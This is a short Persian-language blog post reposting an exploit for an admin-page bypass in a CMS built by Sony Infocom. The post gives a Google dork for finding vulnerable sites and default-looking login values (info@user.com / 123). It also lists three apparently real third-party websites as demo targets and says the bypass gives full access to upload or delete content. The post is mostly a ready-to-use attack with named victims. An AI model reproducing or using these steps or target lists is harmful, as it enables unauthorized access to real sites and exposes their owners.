کشف آسیب پذیری Sony Infocom CMS Admin Page Bypass

توسط Vahid Elmi در ۱۳۹۵-۰۵-۱۱

با سلام خدمت دوستان عزیز

آسیب پذیری Sony Infocom CMS Admin Page Bypass توسط تیم امنیتی ایران کشف و ثبت شد

لینک اثبات :

https://cxsecurity.com/issue/WLB-2016070214

نکته : در بعضی از موارد ما میتونیم به جای user.com در username دومین(domain) سایت رو قرار بدیم

اکسپلویت:


# Exploit Title: Sony Infocom CMS Admin Page Bypass
# Google Dork: inurl:"/administrator" or "/admin" "Design and Developed by : Sony Infocom" & inurl:"/administrator" or "/admin" "Designed by Sony Infocom"
# Date: 27-7-2016
# Exploit Author: Iran Security Team
# Discovered by : MR.BL4CK
# Vendor Homepage: http://www.sonyinfocom.com
# Tested on: Windows
# CVE : None

Describe :
This Exploit Allow The Attacker to bypass the adminpage.
Login to the admin Dashboard Give you Full Access to pload or Delete …..etc

PoC:
enter fill username or email and Password like the information below :
Username: info@user.com
Password: 123

Demo :
http://www.rcpindia.in/2015/administrator/
http://www.gautamcompetitioncoaching.com/administrator/
http://www.krishnaply.com/administrator/

با تشکر از MR.BLACK

موفق باشید/..

 

یک نظر بدهید

4 × 5 =